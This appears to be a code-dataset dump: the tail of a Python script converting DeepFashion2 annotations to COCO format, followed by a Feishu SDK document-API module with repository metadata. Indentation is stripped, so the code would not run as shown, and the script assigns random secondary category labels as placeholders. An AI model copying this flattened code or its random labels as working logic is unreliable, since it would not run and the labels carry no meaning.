'167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 4,
'name': "long_sleeved_outwear",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 5,
'name': "vest",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 6,
'name': "sling",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 7,
'name': "shorts",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 8,
'name': "trousers",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 9,
'name': "skirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 10,
'name': "short_sleeved_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 11,
'name': "long_sleeved_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 12,
'name': "vest_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 13,
'name': "sling_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
# categories2
dataset['categories2'].append({
'id': 1,
'name': "commodity",
'supercategory': "fashion",
})
dataset['categories2'].append({
'id': 2,
'name': "model",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 3,
'name': "detail",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 4,
'name': "specification",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 5,
'name': "unknown",
'supercategory': "fashion"
})
# dataset['categories2'].append({
# 'id': 0,
# 'name': "ignore",
# 'supercategory': "fashion"
# })
top_categories = (1, 2, 3, 4, 5, 6)
down_categories = (7, 8, 9)
whole_categories = (10, 11, 12, 13)
categories2_name = ['commodity', 'model', 'detail', 'specification', 'unknown']
part_name = ['ignore', 'top', 'down', 'whole']
total_landmark_nums = [25, 33, 31, 39, 15, 15, 10, 14, 8, 29, 37, 19, 19]
scale_types = ['unknown', 'small', 'modest', 'large']
class item:
def __init__(self, cat, viewpoint, scale, bbox, num_points):
self.viewpoint = viewpoint
self.bbox = bbox
self.cat = cat
self.num_points = num_points
self.scale = scale
# all bboxes are truncated, return true
def bbox_is_truncated(bbox, image_size):
clip = 5
if bbox[0] < clip or bbox[1] < clip or image_size[0] - (bbox[0] + bbox[2]) < clip \
or image_size[1] - (bbox[1] + bbox[3]) < clip:
return True
return False
def bbox_area_ratio(bbox, image_size):
return float(bbox[2] * bbox[3]) / float((image_size[0] * image_size[1]))
def object_judge(landmark_ratio, viewpoint, bbox_truncated):
if viewpoint == 1:
if landmark_ratio > 0.75:
return True
elif landmark_ratio < 0.4:
return False
else:
if bbox_truncated:
return False
else:
return True
elif viewpoint == 2:
if landmark_ratio > 0.75:
return True
elif landmark_ratio < 0.4:
return False
else:
if bbox_truncated:
return False
else:
return True
elif viewpoint == 3:
if landmark_ratio > 0.6:
return True
elif landmark_ratio < 0.3:
return False
else:
if bbox_truncated:
return False
else:
return True
return False
def deepfashion2noah(items, image_size):
bboxes = []
viewpoints = []
cats = []
num_points = []
landmark_ratios = []
scales = []
for item in items:
bboxes.append(item.bbox)
viewpoints.append(item.viewpoint)
cats.append(item.cat)
num_points.append(item.num_points)
scales.append(item.scale)
landmark_ratios.append(float(item.num_points) / float(total_landmark_nums[item.cat - 1]))
# toward: 1 means front, 2 means back or side
toward = viewpoints[0] - 1
# detail
res = True
#for bbox in bboxes:
# if bbox_is_truncated(bbox, image_size):
# continue
# else:
# res = False
# break
if len(cats) == 1:
for scale, landmark_ratio, bbox in zip(scales, landmark_ratios, bboxes):
bbox_ratio = bbox_area_ratio(bbox, image_size)
#print("landmark ratio {}, bbox ratio {}".format(landmark_ratio, bbox_ratio))
if scale_types[scale] == 'large' and landmark_ratio < 0.68 and bbox_ratio > 0.6:
category2_id = 3
return category2_id, None, toward
#commodity
for viewpoint in viewpoints:
if viewpoint == 1:
category2_id = 1
return category2_id, None, 1
#model
category2_id = 2
# part : 1 means top part, 2 means down part, 3 means the whole model
part = 0
for cat, landmark_ratio, bbox, viewpoint in zip(cats, landmark_ratios, bboxes, viewpoints):
if cat in top_categories and \
object_judge(landmark_ratio, viewpoint, bbox_is_truncated(bbox, image_size)):
part |= 1
elif cat in down_categories and \
object_judge(landmark_ratio, viewpoint, bbox_is_truncated(bbox, image_size)):
part |= 2
elif cat in whole_categories and \
object_judge(landmark_ratio, viewpoint, bbox_is_truncated(bbox, image_size)):
part |= 3
#print("cat {}, landmark_ratio {}, part {}".format(cat, landmark_ratio, part))
return category2_id, part, toward
start_id = 150001
num_images = 41960
root_dir = '/Users/fangcheng.ji/Documents/datasets/deepfashion2/train/'
#root_dir = '/Users/fangcheng.ji/Documents/datasets/deepfashion2/train/'
sub_index = 0 # the index of ground truth instance
sub_index2 = 0 # the index of annotations2 ground truth instance
for num in range(start_id, start_id + num_images):
json_name = root_dir + 'annos/' + str(num).zfill(6)+'.json'
image_name = root_dir + 'image/' + str(num).zfill(6)+'.jpg'
print("processing {}".format(image_name))
if (num>=0) and os.path.isfile(image_name):
imag = Image.open(image_name)
width, height = imag.size
items = []
with open(json_name, 'r') as f:
temp = json.loads(f.read())
source = temp['source']
# filter the user data first, only use the shop data in phase 1
if source != 'shop':
continue
pair_id = temp['pair_id']
dataset['images'].append({
'coco_url': '',
'date_captured': '',
'file_name': str(num).zfill(6) + '.jpg',
'flickr_url': '',
'id': num,
'license': 0,
'width': width,
'height': height
})
for i in temp:
if i == 'source' or i=='pair_id':
continue
else:
points = np.zeros(294 * 3)
sub_index = sub_index + 1
# bounding box
box = temp[i]['bounding_box']
w = box[2]-box[0]
h = box[3]-box[1]
x_1 = box[0]
y_1 = box[1]
bbox=[x_1,y_1,w,h]
# category
cat = temp[i]['category_id']
cat_name = temp[i]['category_name']
# other attribute
style = temp[i]['style']
viewpoint = temp[i]['viewpoint']
scale = temp[i]['scale']
zoom_in = temp[i]['zoom_in']
occlusion = temp[i]['occlusion']
#segmentation and landmarks
seg = temp[i]['segmentation']
landmarks = temp[i]['landmarks']
points_x = landmarks[0::3]
points_y = landmarks[1::3]
points_v = landmarks[2::3]
points_x = np.array(points_x)
points_y = np.array(points_y)
points_v = np.array(points_v)
if cat == 1:
for n in range(0, 25):
points[3 * n] = points_x[n]
points[3 * n + 1] = points_y[n]
points[3 * n + 2] = points_v[n]
elif cat ==2:
for n in range(25, 58):
points[3 * n] = points_x[n - 25]
points[3 * n + 1] = points_y[n - 25]
points[3 * n + 2] = points_v[n - 25]
elif cat ==3:
for n in range(58, 89):
points[3 * n] = points_x[n - 58]
points[3 * n + 1] = points_y[n - 58]
points[3 * n + 2] = points_v[n - 58]
elif cat == 4:
for n in range(89, 128):
points[3 * n] = points_x[n - 89]
points[3 * n + 1] = points_y[n - 89]
points[3 * n + 2] = points_v[n - 89]
elif cat == 5:
for n in range(128, 143):
points[3 * n] = points_x[n - 128]
points[3 * n + 1] = points_y[n - 128]
points[3 * n + 2] = points_v[n - 128]
elif cat == 6:
for n in range(143, 158):
points[3 * n] = points_x[n - 143]
points[3 * n + 1] = points_y[n - 143]
points[3 * n + 2] = points_v[n - 143]
elif cat == 7:
for n in range(158, 168):
points[3 * n] = points_x[n - 158]
points[3 * n + 1] = points_y[n - 158]
points[3 * n + 2] = points_v[n - 158]
elif cat == 8:
for n in range(168, 182):
points[3 * n] = points_x[n - 168]
points[3 * n + 1] = points_y[n - 168]
points[3 * n + 2] = points_v[n - 168]
elif cat == 9:
for n in range(182, 190):
points[3 * n] = points_x[n - 182]
points[3 * n + 1] = points_y[n - 182]
points[3 * n + 2] = points_v[n - 182]
elif cat == 10:
for n in range(190, 219):
points[3 * n] = points_x[n - 190]
points[3 * n + 1] = points_y[n - 190]
points[3 * n + 2] = points_v[n - 190]
elif cat == 11:
for n in range(219, 256):
points[3 * n] = points_x[n - 219]
points[3 * n + 1] = points_y[n - 219]
points[3 * n + 2] = points_v[n - 219]
elif cat == 12:
for n in range(256, 275):
points[3 * n] = points_x[n - 256]
points[3 * n + 1] = points_y[n - 256]
points[3 * n + 2] = points_v[n - 256]
elif cat == 13:
for n in range(275, 294):
points[3 * n] = points_x[n - 275]
points[3 * n + 1] = points_y[n - 275]
points[3 * n + 2] = points_v[n - 275]
num_points = len(np.where(points_v > 0)[0])
items.append(item(cat, viewpoint, scale, bbox, num_points))
dataset['annotations'].append({
'area': w*h,
'bbox': bbox,
'category_id': cat,
'id': sub_index,
'pair_id': pair_id,
'image_id': num,
'iscrowd': 0,
'style': style,
'num_keypoints':num_points,
'keypoints':points.tolist()
#'segmentation': seg,
})
# category2_id, part, toward = deepfashion2noah(items, (width, height))
# for test
# if category2_id == 2:
# new_path = image_name.replace('image', categories2_name[category2_id] + '/' + part_name[part])
# else:
# new_path = image_name.replace('image', categories2_name[category2_id])
#
# shutil.move(image_name, new_path)
part = 0
toward = 0
sub_index2 += 1
dataset['annotations2'].append({
'image_id': num,
'id': sub_index2,
'category2_id': random.randint(1, 5),
'part': part if part is not None else 0,
'toward': toward if toward is not None else 0,
'ignore': 1 # 1 means ignore the result
})
json_name = root_dir + 'classification_ignore_19w.json'
with open(json_name, 'w') as f:
json.dump(dataset, f)
| 3,425 | -10 | 140 |
fe23fff39b7dd739ed6401f91a2cedc997fe08c6 | 1,606 | py | Python | feishu/api_drive_doc.py | crisone/feishu-python-sdk | 36a610926553f0fc5325c87d3955fde5f5d417be | [
"MIT"
] | 44 | 2020-08-11T04:35:53.000Z | 2022-03-09T16:23:55.000Z | feishu/api_drive_doc.py | crisone/feishu-python-sdk | 36a610926553f0fc5325c87d3955fde5f5d417be | [
"MIT"
] | 2 | 2020-10-21T08:07:20.000Z | 2021-09-10T08:42:03.000Z | feishu/api_drive_doc.py | crisone/feishu-python-sdk | 36a610926553f0fc5325c87d3955fde5f5d417be | [
"MIT"
] | 12 | 2020-10-01T07:00:31.000Z | 2022-03-13T14:59:06.000Z | # coding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
from typing import TYPE_CHECKING
from feishu.dt_drive import DriveDocFileMeta
from feishu.dt_help import make_datatype
if TYPE_CHECKING:
from feishu.api import OpenLark
| 30.884615 | 89 | 0.684309 | # coding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
from typing import TYPE_CHECKING
from feishu.dt_drive import DriveDocFileMeta
from feishu.dt_help import make_datatype
if TYPE_CHECKING:
from feishu.api import OpenLark
class APIDriveDocMixin(object):
def get_drive_doc_content(self, user_access_token, doc_token):
"""获取 doc 文件内容
:type self: OpenLark
:param user_access_token: user_access_token
:type user_access_token: str
:param doc_token: 文件的 token
:type doc_token: str
:return: 文件原始内容
:rtype: str
该接口用于获取文档的纯文本内容,不包含富文本格式信息,主要用于搜索,如导入 es 等。
https://open.feishu.cn/document/ukTMukTMukTM/ukzNzUjL5czM14SO3MTN
"""
url = self._gen_request_url('/open-apis/doc/v2/{}/raw_content'.format(doc_token))
res = self._get(url, auth_token=user_access_token)
return res['data']['content']
def get_drive_doc_meta(self, user_access_token, doc_token):
"""获取 doc 文件元信息
:type self: OpenLark
:param user_access_token: user_access_token
:type user_access_token: str
:param doc_token: 文件的 token
:type doc_token: str
:return: 文件元内容
:rtype: DriveDocFileMeta
该接口用于根据 docToken 获取元数据。
https://open.feishu.cn/document/ukTMukTMukTM/uczN3UjL3czN14yN3cTN
"""
